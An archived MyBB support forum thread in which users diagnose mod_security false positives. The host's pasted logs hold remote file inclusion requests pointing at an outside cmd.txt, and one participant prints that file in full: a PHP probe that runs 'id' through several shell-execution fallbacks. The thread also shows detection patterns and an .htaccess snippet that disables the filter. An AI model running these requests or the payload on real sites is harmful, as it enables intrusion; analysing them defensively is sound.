MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.2 Series > MyBB 1.2 General Support > User being directed to private.php
Full Version: User being directed to private.php
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3

hemi

2007-09-05, 02:47 AM
He also runs no anti-virus btw..

Chris Boulton

2007-09-05, 02:51 AM
To me, it sounds like a problem related to mod_security, which I've just noticed is installed on your server.

What mod_security does is (part of it) it checks incoming variables from pages for malicious content/keywords and denies access to pages. However, the problem with this is there are lots of perfectly valid uses for those keywords and some people may have a perfectly legitimate use for them (phrases such as passwd, wget, rcp etc)

Can you follow the instructions in this thread: http://community.mybboard.net/showthread.php?tid=7592 to disable mod_security, and see if he has any problems then?

hemi

2007-09-05, 03:06 AM
Im on the phone with my host right now actually Smile

hemi

2007-09-05, 03:19 AM
I had to submit a ticket because this will go deeper past the phone techs abilities. They're usually fairly fast. Thanks for the fast responses Chris. Not sure how long it will be so I'll post the results when I get them and let you know.

I would of done that, but I know it's against my tos to make any changes to the server security.. I'm a rule follower Toungue So I went the safe route.

User 2877

2007-09-05, 06:51 AM
Also make sure it's not a username problem. I had a problem on my TVG site with certain member username characters. See if he can PM anyone else.

hemi

2007-09-05, 10:11 PM
Well, here we go Big Grin

Ok Chris, Not been tested but I think when my user comes back on it will work. Here's what my host said. Also, after you move this post, can you please answer whyat the tech is requesting as an alternate to the mod_security function. And can you also tell me what is so suspicious about those posts that would concern them. I have listed the reasons why mod security has kicked in in the response from my host. And again, I will post my users response when he appears to verify this has worked for him.. And again, thank you Chris

As far as your issue is concerned, I have disabled mod_security for your forum. The main issue with your site was mod_sec blocking some suspicious posts towards your site. Such examples are:

---
[Sat Sep 1 23:02:12 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:03:29 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:05:14 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:06:14 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:10:19 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:11:34 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:12:59 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/newreply.php"]
[Mon Sep 3 23:23:19 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/printthread.php?tid=534/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:23:19 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:23:19 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:23:41 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/showthread.php?tid=534&pid=3751/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:36 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/printthread.php?tid=534/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:37 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:37 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:53 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/showthread.php?tid=534&pid=3751/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Tue Sep 4 06:26:20 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/robots.txt"]
[Tue Sep 4 06:28:21 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/forum/myps.php?action=donate&username=mickzilla"]
[Tue Sep 4 07:49:00 2007] [error] [client 64.124.85.79] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/robots.txt"]
[Tue Sep 4 07:51:00 2007] [error] [client 64.124.85.79] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/forum/archive/index.php/thread-643.html"]
[Tue Sep 4 08:46:24 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/robots.txt"]
[Tue Sep 4 08:48:31 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/forum/attachment.php?aid=525"]
[Tue Sep 4 09:40:29 2007] [error] [client 216.77.62.44] mod_security: Access denied with code 403. Error processing request body: Multipart: final boundary missing [hostname "www.xxx.com"] [uri "/forum/editpost.php"]

---

Just to give you an idea about what we were blocking towards your site. The rules are not foolproof, so turning them off for a client is not a violation of our TOS. However, I would advise you contact your vendor, make sure your scripts are up to date, and possible ask them if they have any mod_sec rulesets which they recommend for their product. If they have any, you should use them.

Please test it out now and let me know if you are having any issues.

Regards,

Ryan Gordon

2007-09-05, 10:17 PM
Just for curiosity purposes here On September 3rd, it looks like someone was trying to hack you.

http://estballet.ee/media/cmd.txt

<?php
echo "Mic22";
$dir = @getcwd();
$ker = @php_uname();
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 
exit;

mod_security did what it did best and blocked that script (even though it wouldn't have worked anyway).

I suspect your having the same problem with mod_security with private.php and the others. Since its not against your host's TOS I suggest you put that script up that chris pointed you towards above

hemi

2007-09-05, 11:00 PM
That hack attempt would be coming from Estonia is that correct? .ee is Estonia.

If they already disabled mod_security, then why would I need to add the script? Am I missing something else. Not a hard coder as you know Tikitiki.

And thank you for finding that hack attempt. Smile

I'm also curious, if mod security couldn't of stopped this, then what did?

hemi

2007-09-05, 11:20 PM
When I checked, I found this-
This is the code I believe they put in my forum .htaccess

<IfModule mod_security.c>
        SecFilterEngine Off
</IfModule>

Chris Boulton

2007-09-05, 11:27 PM
hemi Wrote:That hack attempt would be coming from Estonia is that correct? .ee is Estonia.

If they already disabled mod_security, then why would I need to add the script? Am I missing something else. Not a hard coder as you know Tikitiki.

And thank you for finding that hack attempt. Smile

I'm also curious, if mod security couldn't of stopped this, then what did?

The fact that none of the variables such as "GlobalSettings[templatesDirectory]" are present in MyBB and other variables that MyBB are secured.

These are automated bots which are doing this to your forum - you're not a specific target.
Pages: 1 2 3
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.2 Series > MyBB 1.2 General Support > User being directed to private.php